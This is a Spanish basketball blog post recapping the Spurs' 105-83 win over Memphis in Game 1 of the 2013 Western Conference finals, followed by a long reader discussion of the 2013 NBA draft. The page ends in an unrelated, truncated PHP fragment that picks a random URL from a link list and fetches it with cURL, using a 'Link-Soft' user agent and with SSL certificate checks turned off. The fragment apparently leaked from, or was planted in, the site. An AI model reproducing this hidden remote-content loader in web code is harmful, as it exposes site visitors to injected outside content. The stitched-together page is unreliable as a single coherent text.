La Crónica: Una dosis de realidad

20 de May de 2013 por MagicJohnson32

spurs marcLos Grizzlies venían siendo durante toda la campaña y especialmente en estos Playoffs un rival desquiciador para cualquiera, que aplicaba un juego ofensivo aparentemente sencillo basado en el colectivo y que en defensa desactivaba a jugadores clave con precisión quirúrgica. Anoche, en el partido inaugural de las finales del Oeste, el que suponía el debut de Memphis en una cita de semejante alcurnia, los Grizzlies recibieron una dosis de su propia medicina. Fue una dosis de dura realidad: lo que valió ante Clippers y Thunder no alcanzará, ni de lejos, frente a los Spurs, claros vencedores de un primer asalto que deja a Memphis repleto de dudas (83-105).

Un 2-0 a los 22 segundos de partido fue la única ventaja visitante en toda la noche. A partir de ahí, San Antonio sacó el mazo. El juego dinámico de pases ideado por Popovich nada tiene que ver con las propuestas de Del Negro y Brooks, que dejaban el balón y el destino de sus equipos en manos de Chris Paul y Kevin Durant respectivamente. Tony Parker está al frente del pelotón, sí, pero el balón no deja de circular hasta encontrar el tiro cómodo. Los Spurs avasallaron a su rival en muchos momentos, desarbolaron el entramado de los Grizzlies y así llegaron 14 triples, 11 de ellos entre Leonard, Green y Bonner. Conley y Allen, dos primerísimas figuras en lo que se refiere a defensa de perímetro, quedaron en evidencia ante la exhibición local.

Aunque si alguien sale tocado de este primer partido es Zach Randolph, calamitoso toda la noche, incapaz ante la defensa capitaneada por Tim Duncan, quien en un día discreto en ataque fue capaz de marcar diferencias en el lado contrario de la pista. Marc Gasol, algo Conley y sobre todo Pondexter fueron los únicos jugadores de los Grizzlies que vieron aro. Hay que destacar a Quincy Pondexter, máximo anotador y autor de todos los triples de su equipo, además de  protagonista del intento de remontada visitante en el tercer cuarto (que finalmente quedó en nada por la oportuna aparición de Ginóbili). Avisamos en la previa de que la falta de pólvora del perímetro de los Grizzlies podía ser un factor determinante, y poco ha tardado en quedar demostrado. Bayless, Conley y Prince tendrán que sumar más, o los Spurs van a vivir muy cómodamente echando sus redes sobre Marc y Randolph.

Las buenas noticias para los Grizzlies: es sólo un partido, ya perdieron los partidos inaugurales de las dos eliminatorias anteriores y Zach Randolph no puede jugar peor de lo que lo hizo anoche. La malas: todo lo demás. Y las peores: que Popovich no va a dejar que los Spurs se confíen tras anotarse el 1-0 de manera tan contundente.

PREMIOS

tony parker allenMVP: Máximo anotador y asistente del partido, Tony Parker desmontó la defensa de los Grizzlies como y cuando quiso. El jugador nacido en Brujas metió 20 puntos (9 de 14 tiros), repartió 9 asistencias en 33 minutos y fue el claro dominador el partido.

Sorpresa: Popovich echó mano de Matt Bonner, como ya hiciera en primera ronda ante los Lakers, y The Red Mamba volvió a cumplir. Su 4 de 6 en triples para 12 puntos en apenas 17 minutos fueron la mayor aportación del banquillo texano.

Decepción: Sin lugar a dudas, la actuación más decepcionante fue la de Zach Randolph, que metió un solo tiro (1/8) y se quedó en 2 puntos y 7 rebotes. Como decimos unas líneas más arribas, a peor no puede ir.

Esfuerzo en vano: Si en algún momento tuvieron esperanzas los Grizzlies, fue gracias a Quincy Pondexter. 11 puntos consecutivos suyos en el tercer cuarto hicieron pensar en la remontada. Aun así, excelente actuación del alero de los Grizzlies, máximo anotador de su equipo con 17 puntos, 5 triples y un 6 de 11 en tiros.

RESUMEN

Imágenes | AP Photos / Getty Images

Comenta

32 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    La clave es que el balón circula muy rápido, y Memphis tiene problemas para defender el perímetro. O al menos ayer los tuvo, porque si nos damos cuenta, San Antonio apenas intentó jugar dentro, porque sabían que tenían desventaja. Parker desquició a Conley, lo fundió a correr, y Conley entró al trapo.

    Hollins tiene que tener un plan b, y es poner a Allen sobre Parker. En los Spurs todos los jugadores son inofensivos en ataque si Parker no los encuentra, y para eso, hay que hacerle una defensa de mil pares de narices. Y tb sufrió muchísimo ayer Memphis con el rebote defensivo, Spurs sacaron muchísimos rebotes ofensivos que les dejaron segundas oportunidades. Lo dicho, el segundo partido tienen que estar más inteligentes, no salir a tumba abierta a meter más puntos que los Spurs, que eso es de locos, sino intentar minimizar el impacto de Tony Parker. El año pasado Sefolosha lo hizo con los Thunder, y este año Allen tiene que imitarlo. Yo si fuera Hollins estaría poniéndoles hoy vídeos de aquella eliminatoria para que aprendan a pararlo

      Citar

  2. L.Casei dice:
    #2

    Bueno, me gané la apuesta al ganar los Spurs… pero no hay q engañarse, la eliminatoria aun puede ser larga… Memphis empezó perdiendo 2-0 vs. LAC y ganó 4-2… y empezó palmando en OKC para barrerlos luego 4-1…
    No lo va a tener fácil, yo sigo viendo favoritos a SAS…
    La serie va a ser tan intensa, sucia y dura como se preveía… pero lo lógico es que se imponga la profundidad del banquillo de San Antonio… Pops ha dosificado los últimos meses y parece que llegan a tono en el momento adecuado.
    En lo que no he acertado precisamente es en que no llegarían a 100 puntos en ningún partido…

      Citar

  3. jas dice:
    #3

    Sancho coincido totalmente contigo, tienen que parar a parker por lo civil o lo criminal es el catalizador total de este equipo en ataque. No estaría mal que Hollins les pusiera a sus chicos los videos para ver como paraba Popovich a Nash, un poco de su medicina no le vendría nada mal.

      Citar

  4. GreenPride dice:
    #4

    Pues podríamos decir que en este primer partidzao todo lo que podía salir bien para San Antonio salió bien y casi todo lo que podía salir mal para Memphis salió mal.
    Como todo el mundo comenta el principal problema para Memphis fue que San Antonio consiguió que su ataque destrozase a la defensa de los Grizzlies. La eliminatoria se presentaba como una lucha del ataque de Spurs contra la defensa de Grizzlies y esta vez el ataque de San Antonio fue mucho mejor. Parker volvió loco a Conley bien directamente y sobre todo tras el bloqueo del hombre al que defendiera Z-Bo y a partir de las ventajas creadas en esa acción la bola se movía siempre para encontrar al hombre libre que ametrallase a la defensa de los de Memphis. A esto se unió que para Memphis es absolutamente necesario que sus dos interiores dominen a sus pares y sumen los más puntos posible y ayer si bien Marc tuvo un día aceptable, Randolph estuvo totalmente fuera del partido y desaparecido.
    Ahora toca a Memphis intentar reaccionar enseguida e intentar ajustar tanto su defensa como su ataque. Lo consiguieron en las otras dos eliminatorias en las que también empezaron perdiendo y supieron darle la vuelta. Veremos si ahora vuelven a hacerlo. Para conseguirlo la receta parece la misma, dominio interior y tratar de colapsar más las líneas de pase para que los Spurs no maten desde todas partes con tiros abiertos. De momento muy superiores en este partido pero yo sigo creyendo que será una serie larga y disputada.

      Citar

  5. fabas dice:
    #5

    Aún sigo pensando que los memphis tienen posibilidades.
    Los tenían muy bien estudiados, y en su grandeza interior residió su perdición. Se ocuparon totalmente del juego interior de los memphis, y ellos se dedicaron a la destreza de parker, con la combinación de muchos tiros exteriores: ginobili, incluso a Popovic le salió bien los minutos de bonner.
    Error de los grizzlies : concentrarse en su juego interior y dejarse llevar por el juego rápido, agresivo y exterior de los spurs.
    Solución: no abusar del juego interior sacando balones desde el interior al tiro de marc, o tiro exterior de allen, prince, …; marcaje con ayudas para Parker, y con la defensa de duncan no descuidar tantos tiros fáciles de jugadores exteriores.
    No os fieis que es el primer partido, y la experiencia de los spurs en estas finales es mayor, pero mi opinión es que aún falta mucha guerra por pelear. Intuyo que van a ser todos los partidos de esta eliminatoria duros físicamente como el primer partido.
    De todas formas yo confío en que memphis pasarán a la final.

      Citar

  6. Denise dice:
    #6

    Ya que no hay partidos y esta noche es la Lotería del Draft. Comento que en los últimos días he estado viendo videos de los elegibles para el Draft, en concreto de un canal de Youtube llamado Draftexpress.
    Y para mí, el mejor jugador es Trey Burke, me parece un auetntico jugón.
    De los dos favoritos para el pick 1, Noel me parece un paquete al estilo Mohammed ó Tyrus Thomas, y McLemore solo aparece metiendo triples abiertos, no he visto de él ni una canasta creandose su propio tiro ó triples en la cara de los defensores.
    Espero que Orlando elija a Trey Burke, si eligiese a Noel, buscaria un trade Noel + Afflalo por Monta Ellis, Gordon ó Jennings; si el elegido es McLemore, buscaría el trade McLemore + Glen Davis

      Citar

  7. Sancho88 dice:
    #7

    Creo Denise que todos pensamos lo mismo más o menos. Yo a Noel lo veo igualito que Dwight Howard, así que supongo que podrá valorar, pero es que hasta en tiros libres es un pakete del 50%. A McLemore sí que le he visto más cosas, no solo triple. Por su forma de jugar y por su manejo de balón, veo que es un tío muy plástico, que no solo sabe tirar de tres, sino que se sabe generar sus propios tiros, penetra decentemente, aprovecha bien los bloqueos y tiene un tiro a canasta muy limpio.

    Pero sí, a mí también me gusta mucho Burke, y sí, yo también me he comido un montón de vídeos del draftexpress, jejee.

    Luego está Otto Porter, que le veo una IQ muy buena, Oladipo que es una bestia y creo que por su actitud puede triunfar en la NBA, Anthony Bennet tiene un físico parecido a Lebron y Alex Len me recuerda a Pau en sus inicios.

    Los demás tampoco puedo opinar mucho xk no los he visto. Creo que Tim Hardaway Jr. va a ser la sorpresa del draft, y el gran pufo “Medvedenkiano” del draft es el señor Kevin Olynik.. dios, tiene una pinta de fracaso… pero impresionante. Ese tío se va a pasar todo el partido haciendo pasos y faltas en ataque. Yo lo veo que records va a batir, pero en faltas por minuto. No sé, no creo que lo draftee nadie y si lo hacen, no va a jugar, y si juega, lo buyoutarán, porque es lamentable.

    Es que si sale Hardaway en el 21 por los Jazz, lo veo un timo lamentable, cuando creo que se hombre debería ser top 10. Ah, y luego Tony Mitchell, que este tío se jugó las ligas de verano con los Kings, igual que Akognon. Es un buen defensor, corre muy bien la transición y por físico machaca muy bien, típica jugada que roba, se la da al base y alleyhoop. Nada más. No tenía mal tiro tampoco… pero vamos, un Donté Greene de la vida. Si ese tío es el 20 pico del draft, los demás paso hasta de mirarlos. El Nogueira no sé, mucho tendrán que hacer con él para sacar un jugador decente, a mí me parece un bluff, aunque claro, Varejao también era un pakete de mil pares de cojones y mira ahora… De todas formas, habrá que ver qué ocurre.

    Y al final, si Muhammad es el crack de la generación igual que lo fue Walker (junto a Irving) desde el puesto numero nueve hace un par de años, se cumplirá mi teoría, y es que los que hacen los mocks son capaces de engañar a equipuchos de mierda como Sacramento que no vale ni para piyar un buen top 5 del draft y solo se basan en los putos mock drafts, sin ver nada más allá, y luego equipos buenos les roban descaradamente a los buenos jugadores que salen del 8º puesto en adelante.

      Citar

  8. Denise dice:
    #8

    Pero es que Burke en los mocks suele estar entre el 6 y el 8!! Muy bajo le dan os pronosticos. Ojala Orlando lo pickee.

    Bueno, Noel no creo que llegue ni a la mitad de Howard, será un simple buen defensor y taponador y poco más.

    Ollynik me recuerda a Robert Swift!!.
    Oladipo y Porter molan, hay un griego negro con un nombre raro que tambien pero tiene menos experiencia. A mi Bennett no me gustó.
    Collum tambien me gusta pero en la NBA. su rol será el de un simple microondas y no un PG de garantías.
    Hay un tal Muscala que he visto videos y me ha gustado, pero en los mocks lo dan en 2º ronda, así que no será gran cosa entonces. Quizás porque no ha jugado en torneos de nivel.
    Y Rudy Gobert no sé si tendrá mucha calidad, pero por fisico no será…

      Citar

  9. rumbero dice:
    #9

    Sancho88:
    Los demás tampoco puedo opinar mucho xk no los he visto. Creo que Tim Hardaway Jr. va a ser la sorpresa del draft, y el gran pufo “Medvedenkiano” del draft es el señor Kevin Olynik.. dios, tiene una pinta de fracaso… pero impresionante. Ese tío se va a pasar todo el partido haciendo pasos y faltas en ataque. Yo lo veo que records va a batir, pero en faltas por minuto. No sé, no creo que lo draftee nadie y si lo hacen, no va a jugar, y si juega, lo buyoutarán, porque es lamentable.

    Pues yo he visto poquito de los chavales pero Olynik no me ha parecido tan pufo como lo pintas. Aunque sólo sea por ser un 7 pies va a ser top 20 casi seguro. Tiene una pinta de blandurrio que te cagas eso sí pero a nivel ofensivo no parece un cacho carne inútil. Si coincido con lo de Oladipo, por habilidades y actitud tiene pinta de jugador NBA. Y el que mola también es Carter-Williams aunque no suene tanto

      Citar

  10. Denise dice:
    #10

    Ah si, Muhammad…es bueno aunque en el video que ví decían que era muy egoista…ese acabará en Wizards o en los Bobcats con toda la chusma.
    Oladipo me recuerda a Artest, hasta juega con el 15. Tiene un bote y un manejo de balón raro igualito.

    Y otro que no me gusta para la pintura es Zeller, con ese fisico tan canijo se lo van a comer con patatas a no ser que en verano se meta de todo y gane como 20 kgs de masa muscular.

      Citar

  11. Jose Luis dice:
    #11

    Entonces Denise, a pesar de que Orlando tiene mucho que desarrollar, jugadores como Harris, Nicholson, Vucevic… prefieres que traspasen su ronda de Draft por una mini-estrella?

    No sé, yo creo que se hace más química creciendo juntos como equipo, que contratando a un tira piedras que se va a creer la superestrella y se va a jugar todo y más. Porque los que has dicho son tira piedras, con excepción quizá de Gordon, pero si no quiere estar en New Orleans porque está lejos de su casa, igual en Orlando.

      Citar

  12. Denise dice:
    #12

    Jose Luis: Entonces Denise, a pesar de que Orlando tiene mucho que desarrollar, jugadores como Harris, Nicholson, Vucevic… prefieres que traspasen su ronda de Draft por una mini-estrella?No sé, yo creo que se hace más química creciendo juntos como equipo, que contratando a un tira piedras que se va a creer la superestrella y se va a jugar todo y más. Porque los que has dicho son tira piedras, con excepción quizá de Gordon, pero si no quiere estar en New Orleans porque está lejos de su casa, igual en Orlando.

    No. Lo que yo quiero es draftear a Trey Burke.
    Pero si draftean a McLemore o Noel, cuyos videos que he visto no me convencen, si prefiero traspasarlo junto con el contratito de Afflalo ó Davis por un mini-estrella, tirapiedras ó como quieras llamar a Ellis, Jennings, Gordon ó en definitiva cualquier base/escolta de la liga que se cree sus propios tiros siempre y cuando cobren alrededor de 10 millones de dólares.
    Los Joe Johnson, y similares que se los queden otros.

      Citar

  13. melo15 dice:
    #13

    Bueno yo a Zeller no lo veo tan malo. Puede que no sea fuerte ni sea una bestia taponando, pero es el pivot mas rapido y el que salta mas de toda la camada ( 1 en los Draft Combine) y tiene mucho IQ, ademas de buen juego en el poste. Pau también era un tirillas cuando llegó a la NBA?
    el mejor es sin duda Try Burke, puede que sea un canijo pero tiene es un lider de cojones y tiene un clutch tremendo.
    Pronto llegara el mock draft no os estreseis.

      Citar

  14. Denise dice:
    #14

    melo15:
    Bueno yo a Zeller no lo veo tan malo. Puede que no sea fuerte ni sea una bestia taponando, pero es el pivot mas rapido y el que salta mas de toda la camada ( 1 en los Draft Combine) y tiene mucho IQ, ademas de buen juego en el poste. Pau también era un tirillas cuando llegó a la NBA?
    el mejor es sin duda Try Burke, puede que sea un canijo pero tiene es un lider de cojones y tiene un clutch tremendo.
    Pronto llegara el mock draft no os estreseis.

    Yo tampoco he dicho que sea malo, digo que le hace falta meterse este verano un montón de kilos en el cuerpo.

    Sobre Trey Burke, el problema es que no entiendo por qué en los mocks está tan bajo. Vuelvo a decir, que solo he visto los típicos videos de cada uno, pero con esto, me parece el mejor jugador de largo.
    – En Nbadraft.net está el Pick 7
    – En Draftexpress: Pick 6
    – En Hoopshype: Pick 5
    – Hoopsworld: Pick 5
    – ESPN: Pick 5
    – Bleacherreport: Pick 5

    Llega un punto en que prefiero que Orlando se lleve el pick 4 esta noche y elija a este muchacho. Si se llevan el pick 1, seguramente elegirán a Noel ó McLemore para no hacer el feo de ir contracorriente.

      Citar

  15. melo15 dice:
    #15

    Bueno Denise, porque tiene un par de defectos bastante marcados, para empezar el fisico, ahi falla un poco porque aparte de que mide 1’81 no es un prodigio atletico. Ademas de que su defensa es un interrogante y vamos a ver como se apaña en la NBA.
    Yo lo veo en el Top-5 segurisimo.

      Citar

  16. melo15 dice:
    #16

    Yo creo que Noel va a salir en el uno, porque aunque no creo que vaya a ser un all-star, si pienso que va a ser un bastión defensivo, a lo Marcus Camby. Ademas para los equipos que les queda un año mas de reconstrucción: Orlando, Charlotte, Phoenix lo ideal sería pillar a Noel y asi ya tienes la posicion de Center cubrida y en el Draft 2014 que viene cargado de cracks pues ya escogeras a tu jugador franquicia. No creeis?

      Citar

  17. safd dice:
    #17

    melo15: Es que si sale Hardaway en el 21 por los Jazz, lo veo un timo lamentable, cuando creo que se hombre debería ser top 10. Ah, y luego Tony Mitchell, que este tío se jugó las ligas de verano con los Kings, igual que Akognon. Es un buen defensor, corre muy bien la transición y por físico machaca muy bien, típica jugada que roba, se la da al base y alleyhoop. Nada más. No tenía mal tiro tampoco… pero vamos, un Donté Greene de la vida. Si ese tío es el 20 pico del draft, los demás paso hasta de mirarlos. El Nogueira no sé, mucho tendrán que hacer con él para sacar un jugador decente, a mí me parece un bluff, aunque claro, Varejao también era un pakete de mil pares de cojones y mira ahora… De todas formas, habrá que ver qué ocurre.

    Bueno, Zeller batio creo el record para un 7 pies en el salto ese, pero luego miras su envergadura y es cortilla que para mi importa mas que saltar unas pulgadas mas o menos en el salto del draftcombine…

    Yo estoy con Denise 100% en que Orlando necesita a Trey Burke, de hecho es mi jugador favorito del draft. Tiene esa chispa que tienen los jugones. El problema que tiene él es que gran parte de los equipos de la loteria de los de arriba como Charlotte, Cavs, Wizards y demas, tienen ya un base joven y muy bueno, y por eso le perjudica en los mocks… Aunq me parece que el pick 1 debe ser Noel, un jugador que tiene un potencial enorme, que te aporta en casi todo (menos en anotacion, cosa que puede mejorar algo aunq sea con el tiempo) y puede ser una bestia defensiva… McLemore tiene opciones de ser pick 1 tb si llegan equipos con el puesto de Center cubierto tipo Pistons o Jazz (aunq q llegasen Jazz ya seria raro claro xd), pero este me deja muy frio, como decis le cuesta crearse sus tiros y tb creo que le falta caracter, aunq como pick2-3 lo veo bien, al igual que lo fue Bradley Beal el año pasado.

      Citar

  18. L.Casei dice:
    #18

    Yo a Trey Burke no lo veo en el top-3 del draft. Puede ser un gran jugador de NBA, pero si algo abunda en la actual es ese perfil de base fuerte capaz de anotar y dirigir, sobre todo en los últimos años con la factoría Calipari (Memphis/Kentucky): Rose, Tyreke, Wall,etc… Es ese perfil de jugador pero quizá con un punto menos de calidad, aunque su fuerte es yo creo q la mentalidad competitiva q tiene y el físico, potente y duro aunque con pocos cms…
    Yo lo veo pues en el top-10, aunque nunca se sabe…

      Citar

  19. Denise dice:
    #19

    melo15:
    Yo creo que Noel va a salir en el uno, porque aunque no creo que vaya a ser un all-star, si pienso que va a ser un bastión defensivo, a lo Marcus Camby. Ademas para los equipos que les queda un año mas de reconstrucción: Orlando, Charlotte, Phoenix lo ideal sería pillar a Noel y asi ya tienes la posicion de Center cubrida y en el Draft 2014 que viene cargado de cracks pues ya escogeras a tu jugador franquicia. No creeis?

    Yo tambien creo que Noel va a ser el pick 1, siempre y cuando no elija primero Orlando.
    Con Vucevic, Harris, Glen Davis, Nicholson y O’Quinn, los Magic tienen su pintura más que cubierta para el próximo año, a no ser que lo elijan para traspasarlo ó apuesten por Noel, pasar a Harris al SF y/o traspasar a Davis. Además, según he leido, el GM, Henningan tiene muchas dudas sobre Noel debido a su lesión de ACL.

    Si por el contrario son los Bobcats ó los Cavs los del pick 1, eligen a Noel seguro porque de perimetro ya andan sobrados.
    ¿Y no os gusta Rudy Gobert? Está canijo como una caña y quizás su año rookie pueda ser muy duro para él, pero con el fisico y los brazos tan largos que tiene, más algunos buenos movimientos que le he visto, yo le auguro una buena carrera NBA. No sería mala elección para unos Blazers o unos 76ers.

      Citar

  20. Melo15 dice:
    #20

    Le dan en los mitad de primera ronda con suerte. Le veo muy tirillas y aunque sea muy alto y tenga mucha envergadura, si no gana kilos nada de nada.

      Citar

  21. L.Casei dice:
    #21

    Yo lo he visto en la final-4 y varios partidos más con los Wolverines y créeme Melo de tirillas nada de nada es un cañón, muy potente y rápido en el 1 vs. 1 y tren inferior muy fuerte. Ya lo verás. Sí es cierto que debe andar por 6-1 de altura es decir 1.84/1.85 aprox. Se puede comparar para mí con Jameer Nelson, aunque menos anotador quizá… hay que verlo.
    La única duda es el tiro exterior, no lo veo en NBA con buenos pct. en 3-pt pero sí en un rango de 4/5 metros y sobre todo la capacidad de doblar pase tras penetración o buscarse sus tiros.
    Yo sí lo veo entre los 10/12 primeros de este draft’13.

      Citar

  22. L.Casei dice:
    #22

    Ah espera perdón Melo, yo me refería otra vez a Trey Burke… perdón por la gamba…

      Citar

  23. maravich dice:
    #23

    Yo veo como #1 de este draft a Anthony Bennett de UNLV, es un fiera por muy undesized q sea… es carne NBA… aunq no le dan como 1.pick yo no lo descarto. Trey Burke es la leche pero sobran bases como él en muchos equipos… top-5 o 6 quizá… y me gusta Mason Plumlee, curtido y duro tras graduarse en Duke, ya con 22/23 tacos… jugador de rotación interior de un buen equipo… se ha puesto como un toro… y 4 años con Coach K es mucha tela lo que aprendes… Buen futuro, creo. Yo lo veo entre los 7/8 primeros… aunque lo dan entre los 15… veremos.
    Tampoco es un gran draft en cuanto a talento… en principio, claro.

      Citar

  24. Sancho88 dice:
    #24

    Cuidado con lo de draft de mierda, y lo digo porque teoricamente el 2011 era una mierda para muchos, y yo creo que si hacemos un repaso, de las dos primeras rondas, de 60 jugadores hay más de 20 muy válidos ahora mismo. Voy por orden:

    Irving, Derrick Williams, Tristan Thompson, Jonas Valanciunas, Brandon Knight, Kemba Walker, Klay Thompson, Kawhi Leonard, Nikola Vucevic, Iman Shumpert, Tobias Harris, Kenneth Faried, Reggie Jackson, Norris Cole, Jimmy Butler (todos estos primera ronda de un draft, 15 de 30, que muchos dijeron que era una mierda, y me estoy dejando en el tintero a Biyombo, Motiejunas y Mirotic por distintas razones); Vamos por la segunda ronda; Singler, Parsons, ETwaun Moore, Isaiah Thomas.

    A esto lo llamaron un mal draft, así que habrá que esperar este, que todos dicen que no es de gran nivel pero yo creo que sí lo va a ser

      Citar

  25. Jose Luis dice:
    #25

    Cleveland, Orlando, Washington, Charlotte, Suns, Pelicans, Kings, Pistons, Wolves, Blazers, Sixers, Toronto, Mavs, Utah

    Cavs pick 1 con Irving, Waiters, Thompson… Ojo

      Citar

  26. Lucho dice:
    #26

    Imagino a LeBron volviendo a los Cavs cuando termine contrato con el Heat. Despues de todo, el tmb es de Ohio. Es una locura?
    Imagino Irving, Waiters, LeBron, Thompson, Noel. Interesante…

      Citar

  27. Simon dice:
    #27

    Sancho88:
    Cuidado con lo de draft de mierda, y lo digo porque teoricamente el 2011 era una mierda para muchos, y yo creo que si hacemos un repaso, de las dos primeras rondas, de 60 jugadores hay más de 20 muy válidos ahora mismo. Voy por orden:

    Irving, Derrick Williams, Tristan Thompson, Jonas Valanciunas, Brandon Knight, Kemba Walker, Klay Thompson, Kawhi Leonard, Nikola Vucevic, Iman Shumpert, Tobias Harris, Kenneth Faried, Reggie Jackson, Norris Cole, Jimmy Butler (todos estos primera ronda de un draft, 15 de 30, que muchos dijeron que era una mierda, y me estoy dejando en el tintero a Biyombo, Motiejunas y Mirotic por distintas razones); Vamos por la segunda ronda; Singler, Parsons, ETwaun Moore, Isaiah Thomas.

    A esto lo llamaron un mal draft, así que habrá que esperar este, que todos dicen que no es de gran nivel pero yo creo que sí lo va a ser

    Está claro que esto es como un melón, hay que abrirlo para saber cómo está… pero de aquella clase de 2011 yo no recuerdo que los expertos dijeran que era un mal draft, si no que no era un draft con estrellas, si no un draft con mucha clase media y válidad para los equipos pero sin estrellas. Y menos Irving los demás son precisamente eso, clase media.
    En esta clase no se… tambien mucha clase media, pero es que no veo ni una estrella… estais hablando de Burke como jugón de la clase… y yo no termino de verlo de titular en ningún equipo… salvo quizás Jazz y Kings o incluso Orlando si quiere quitarse a Nelson del medio…

    Por cierto veo que Muhammad cae hasta el 16… no he seguido la carrera de este chico pero sorprende cuanto menos tanta caida en cuestión de un año. Se que han sido muchos escandalos, lo de cobrar dinero de la uni, lo de su edad falsa… etc… pero no creeis que viendo que el nivel del draft es muy bajo no compensaría a equipos como Jazz, Minny o incluso Oklahoma a draftearlo aunque luego les salga rana??? es que ahora mismo hay mock que le ponen que cae hasta el 16/18…

      Citar

  28. Denise dice:
    #28

    Simon: Está claro que esto es como un melón, hay que abrirlo para saber cómo está… pero de aquella clase de 2011 yo no recuerdo que los expertos dijeran que era un mal draft, si no que no era un draft con estrellas, si no un draft con mucha clase media y válidad para los equipos pero sin estrellas. Y menos Irving los demás son precisamente eso, clase media.En esta clase no se… tambien mucha clase media, pero es que no veo ni una estrella… estais hablando de Burke como jugón de la clase… y yo no termino de verlo de titular en ningún equipo… salvo quizás Jazz y Kings o incluso Orlando si quiere quitarse a Nelson del medio… Por cierto veo que Muhammad cae hasta el 16… no he seguido la carrera de este chico pero sorprende cuanto menos tanta caida en cuestión de un año. Se que han sido muchos escandalos, lo de cobrar dinero de la uni, lo de su edad falsa… etc… pero no creeis que viendo que el nivel del draft es muy bajo no compensaría a equipos como Jazz, Minny o incluso Oklahoma a draftearlo aunque luego les salga rana??? es que ahora mismo hay mock que le ponen que cae hasta el 16/18…

    No sé, yo en los mocks que he visto siempre (Muhammad) está entre el 6 y el 9. No creo que caiga tan bajo .

    Vista la lotería de anoche, Noel va a ser el 1, y McLemore el 2, seguramente.

      Citar

  29. Simon dice:
    #29

    http://hoopshype.com/draft.htm

    http://www.nbadraft.net/2013mock_draft

    http://www.cbssports.com/nba/draft/mock-draft

    http://nbadraftroom2.blogspot.com.es/p/2013-nba-mock-draft.html

    http://www.draftexpress.com/nba-mock-draft/2013/

    http://www.hoopsworld.com/2013-nba-mock-draft-consensus-ver-2-0

    La verdad es que varía mucho desde el 5 hasta el 16 en algunos. Mi opinión va con la tuya Denise que al final ante la fama que le precede y el miedo a dejarlo pasar y luego sea un gran jugador hará que salga entre el 6 y el 9. Pero sigue sorprendiendome un tío que hace un año lo consideraban el numero 1 y futura super estrella en la NBA y sin haber jugado una mala temporada del todo ahora algunos lo consideren el 16… y la mayoría no lo pongan entre los 10 primeros…

      Citar

  30. Simon dice:
    #30

    Dicho esto si de verdad al menos es capaz de anotar ( aunque sea solo eso ) a Minnesotta le vendría de perlas

      Citar

  31. melo15 dice:
    #31

    Bueno, parece que hay bastantes probabilidades de que los Cavs traspasen su pick. Yo creo que sería una muy buena opción porque aunque tengas la opción de escoger al mejor jugador, en realidad nunca sabes si va a triunfar o no. Por eso creo que han de traspasarlo por un estrella, ya se especuló mucho acerca de que querian a Aldridge, pero Love, Al Horford o Al Jefferson serian otras muy buenas opciones.
    Si finalmente se quedan con el pick yo cogería a Noel sin dudarlo.

      Citar

  32. melo15 dice:
    #32

    Muhammad no va a caer tan bajo, de hecho es casi imposible que baja del Top-10. Es muy buen anotador, y es un gran competidor. Es atletico, buen defensor y se mueve muy bien sin balón, el único problema es que es un chupón de cuidado.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>